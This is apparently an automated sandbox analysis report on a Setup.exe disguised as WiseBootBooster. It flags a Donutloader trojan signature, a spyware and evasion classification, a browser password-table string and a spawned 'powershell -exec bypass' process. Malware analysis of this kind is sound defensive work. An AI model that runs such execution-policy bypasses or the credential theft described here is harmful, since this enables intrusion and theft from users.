Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F8F407	0_2_00F8F407
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FAC5C1	0_2_00FAC5C1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F935BC	0_2_00F935BC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FB25BC	0_2_00FB25BC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FBE58C	0_2_00FBE58C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FABCC3	0_2_00FABCC3
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FB66DC	0_2_00FB66DC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F99676	0_2_00F99676
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F8A66C	0_2_00F8A66C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FA263C	0_2_00FA263C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F9E7DC	0_2_00F9E7DC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F8470C	0_2_00F8470C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FA48DC	0_2_00FA48DC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F8A8CC	0_2_00F8A8CC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F988B7	0_2_00F988B7
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FBE87C	0_2_00FBE87C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FBA9DC	0_2_00FBA9DC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FB09CC	0_2_00FB09CC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FAF9AA	0_2_00FAF9AA
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FA299C	0_2_00FA299C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F8795C	0_2_00F8795C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FAC950	0_2_00FAC950
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FB693C	0_2_00FB693C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F97AD3	0_2_00F97AD3
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F85ABC	0_2_00F85ABC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FA0AA8	0_2_00FA0AA8
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F9EAAC	0_2_00F9EAAC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FA6AAC	0_2_00FA6AAC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F88BCC	0_2_00F88BCC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F92B5A	0_2_00F92B5A
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F96B52	0_2_00F96B52
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F89CDC	0_2_00F89CDC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FABCC3	0_2_00FABCC3
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FB7CBC	0_2_00FB7CBC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FBEC5C	0_2_00FBEC5C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FB5C19	0_2_00FB5C19
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F87DEC	0_2_00F87DEC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FAADEC	0_2_00FAADEC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F8ADAC	0_2_00F8ADAC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FB6E9C	0_2_00FB6E9C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F9AE4C	0_2_00F9AE4C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F9DF4C	0_2_00F9DF4C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FBDF1C	0_2_00FBDF1C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031DDBDB	0_2_031DDBDB
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031F5280	0_2_031F5280
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0320CAC0	0_2_0320CAC0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031FB124	0_2_031FB124
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_032059F0	0_2_032059F0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_03208800	0_2_03208800
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_03205670	0_2_03205670
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0320C6F0	0_2_0320C6F0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031E1D90	0_2_031E1D90
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0320D430	0_2_0320D430
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031FA497	0_2_031FA497
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D84B0	0_2_031D84B0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031E132E	0_2_031E132E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031E5326	0_2_031E5326
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D73A0	0_2_031D73A0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_032043ED	0_2_032043ED
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031F7A2B	0_2_031F7A2B
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031EF27C	0_2_031EF27C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D4290	0_2_031D4290
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031ED280	0_2_031ED280
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031E62A7	0_2_031E62A7
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031DA900	0_2_031DA900
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D6130	0_2_031D6130
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_03205110	0_2_03205110
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031ED940	0_2_031ED940
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031FE17E	0_2_031FE17E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031E797B	0_2_031E797B
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031F1170	0_2_031F1170
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_032091B0	0_2_032091B0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031EB9A6	0_2_031EB9A6
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031FF1A0	0_2_031FF1A0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D29C0	0_2_031D29C0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_03203821	0_2_03203821
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0320D050	0_2_0320D050
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031E708B	0_2_031E708B
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031FC8BE	0_2_031FC8BE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031F30B0	0_2_031F30B0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D90A0	0_2_031D90A0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D58D0	0_2_031D58D0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D38E0	0_2_031D38E0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031EC720	0_2_031EC720
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031ECFB0	0_2_031ECFB0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031F0E10	0_2_031F0E10
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031E9620	0_2_031E9620
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031E7E4A	0_2_031E7E4A
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D8E40	0_2_031D8E40
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_03204EB0	0_2_03204EB0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D2EE0	0_2_031D2EE0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0320CD60	0_2_0320CD60
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031FA497	0_2_031FA497
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031FAD95	0_2_031FAD95
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D9580	0_2_031D9580
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_03200D90	0_2_03200D90
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D65C0	0_2_031D65C0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031F95C0	0_2_031F95C0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031FBCB4	0_2_031FBCB4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_03206490	0_2_03206490
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031F9CC6	0_2_031F9CC6

Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 00F8971C appears 74 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 031D7EF0 appears 75 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 031E4030 appears 49 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 00F9585C appears 49 times

Source: Setup.exe

Static PE information: invalid certificate

Source: Setup.exe

Static PE information: Number of sections : 11 > 10

Source: Setup.exe, 00000000.00000003.1764650749.0000000003BE3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWiseBootBooster.exeD vs Setup.exe
Source: Setup.exe, 00000000.00000000.1683243177.0000000000BF9000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWiseBootBooster.exeD vs Setup.exe
Source: Setup.exe	Binary or memory string: OriginalFilenameWiseBootBooster.exeD vs Setup.exe

Source: Setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/5@3/3

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00F80ABF CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,

0_2_00F80ABF

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_032059F0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,GetVolumeInformationW,

0_2_032059F0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2000:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zznsj3bk.pjd.ps1

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Setup.exe, 00000000.00000003.1816281578.0000000003BE6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1838982146.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Setup.exe	String found in binary or memory: NATS-SEFI-ADD
Source: Setup.exe	String found in binary or memory: NATS-DANO-ADD
Source: Setup.exe	String found in binary or memory: JIS_C6229-1984-b-add
Source: Setup.exe	String found in binary or memory: jp-ocr-b-add
Source: Setup.exe	String found in binary or memory: JIS_C6229-1984-hand-add
Source: Setup.exe	String found in binary or memory: jp-ocr-hand-add
Source: Setup.exe	String found in binary or memory: ISO_6937-2-add
Source: Setup.exe	String found in binary or memory: ;application/vnd.adobe.air-application-installer-package+zip
Source: Setup.exe	String found in binary or memory: application/vnd.groove-help
Source: Setup.exe	String found in binary or memory: "application/x-install-instructions
Source: Setup.exe	String found in binary or memory: step-start
Source: Setup.exe	String found in binary or memory: marker-start

Source: C:\Users\user\Desktop\Setup.exe

File read: C:\Users\user\Desktop\Setup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass error code: 523
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass error code: 523	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Setup.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Setup.exe

Static file information: File size 82950266 > 1048576

Source: Setup.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x6cda00

Source: Setup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Source: Setup.exe

Static PE information: section name: .didata

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03BD418C push 50EFC4E8h; retf	0_3_03BD4191
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03BD418C push 50EFC4E8h; retf	0_3_03BD4191
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03BD418C push 50EFC4E8h; retf	0_3_03BD4191
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FA1ACF push edx; ret	0_2_00FA1AD8
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FBCFDC push eax; mov dword ptr [esp], 4D4C4B9Ah	0_2_00FBCFDF
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031F02A3 push edx; ret	0_2_031F02AC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0320B7B0 push eax; mov dword ptr [esp], 4D4C4B9Ah	0_2_0320B7B3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_07DC3350 push eax; iretd	4_2_07DC3691

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
